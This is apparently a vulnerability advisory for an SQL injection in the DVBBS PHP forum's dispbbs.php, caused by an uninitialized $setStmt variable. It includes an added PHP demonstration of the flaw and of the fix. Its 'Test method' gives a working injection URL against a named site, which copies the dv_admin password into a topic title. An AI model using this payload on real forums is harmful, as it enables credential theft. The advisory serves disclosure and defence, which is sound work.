Affected Systems:
Mobile Network Forum Dvbbs PHP 2.0+
Description:
DVBBS is an open source ASP web forum program developed and maintained by Aspsky.Net.
In the dispbbs.php file of DVBBS:
if ($board_settings[55] != 0 && $TopicInfo['locktopic'] == 0 && DateDiff('d', $TopicInfo['dateandtime'], TIME_NOW) > $board_settings[55]) { // line 85
    $TopicInfo['locktopic'] = 1;
    $setStmt = ', locktopic = 1';
}
$db->query("UPDATE {$dv}topic SET hits = (case when hits is null then 1 ELSE hits + 1 END) {$setStmt} WHERE topicid = {$announceid}");
When the if condition is false, $setStmt is never assigned, and because the variable is not initialized anywhere before the query, a value supplied by the client under the same name (the test case below passes it as a GET parameter) is interpolated unescaped into the UPDATE statement, resulting in an SQL injection vulnerability.
Source: SEBUG
Test method:
http://www.xiaoweio.cn/dispbbs.php?boardid=2&id=1&page=1&setStmt=,title=(select%20password%20from%20dv_admin)
Suggestion:
Temporary solution:
* Initialize the variable $setStmt before it is used in the query.
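The following is an added example, not code from DVBBS or from the advisory, showing the uninitialized-variable pattern described above next to the temporarily fixed version. The functions vulnerableUpdate() and hardenedUpdate(), the sample $request array and the simplified auto-lock condition (the date check is left out) are assumptions made for this demonstration; extract() stands in for register_globals, which imports request parameters as variables before the script's own code runs.

```php
<?php
// Added example, not DVBBS source. extract() simulates register_globals; the
// helper names and sample data are constructed for the demonstration.
declare(strict_types=1);

// Constructed sample state standing in for what dispbbs.php would have loaded.
$dv            = 'dv_';
$announceid    = '1';                        // the "id" URL parameter, still a string
$topicInfo     = ['locktopic' => 0, 'dateandtime' => '2005-01-01 00:00:00'];
$boardSettings = [55 => 0];                  // auto-lock disabled: the if block never runs

// Constructed request mirroring the advisory's test case: an extra "setStmt" parameter.
$request = [
    'boardid' => '2',
    'id'      => '1',
    'page'    => '1',
    'setStmt' => ', title=(select password from dv_admin)',
];

// Mirrors the advisory's code (date check simplified away): $setStmt is only
// assigned inside the if, so when the condition is false the value imported
// from the request is what gets interpolated into the UPDATE statement.
function vulnerableUpdate(array $request, array $topicInfo, array $boardSettings, string $dv, $announceid): string
{
    extract($request);                       // register_globals stand-in
    if ($boardSettings[55] != 0 && $topicInfo['locktopic'] == 0) {
        $setStmt = ', locktopic = 1';
    }
    return "UPDATE {$dv}topic SET hits = (case when hits is null then 1 ELSE hits + 1 END)"
         . " {$setStmt} WHERE topicid = {$announceid}";
}

// Hardened: the script assigns $setStmt itself before any conditional path, so
// whatever register_globals imported is overwritten; the id is cast to int so
// the only other interpolated value cannot carry SQL either.
function hardenedUpdate(array $request, array $topicInfo, array $boardSettings, string $dv, $announceid): string
{
    extract($request);                       // same register_globals stand-in
    $setStmt    = '';                        // the advisory's temporary fix
    $announceid = (int) $announceid;
    if ($boardSettings[55] != 0 && $topicInfo['locktopic'] == 0) {
        $setStmt = ', locktopic = 1';
    }
    return "UPDATE {$dv}topic SET hits = (case when hits is null then 1 ELSE hits + 1 END)"
         . " {$setStmt} WHERE topicid = {$announceid}";
}

$bad  = vulnerableUpdate($request, $topicInfo, $boardSettings, $dv, $announceid);
$good = hardenedUpdate($request, $topicInfo, $boardSettings, $dv, $announceid);

echo "vulnerable: $bad\n";
echo "hardened:   $good\n";
// Quick check a reviewer can run: the client-supplied fragment must not survive.
echo (strpos($good, 'dv_admin') === false ? "hardened query is clean\n" : "STILL INJECTABLE\n");
```

Run it with the PHP CLI: the first query carries the injected "title=(select ...)" fragment, the second contains only the hits counter update. Initializing $setStmt is the minimal fix the advisory proposes; casting $announceid closes the same class of problem for the other interpolated value, and in current PHP register_globals no longer exists, so the variable import simulated here cannot happen at all.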
Vendor patch:
Mobile Network Forum
--------
Currently, the vendor does not provide a patch or upgrade program. We recommend that users of this software monitor the vendor's homepage to obtain the latest version:
http://www.dvbbs.net/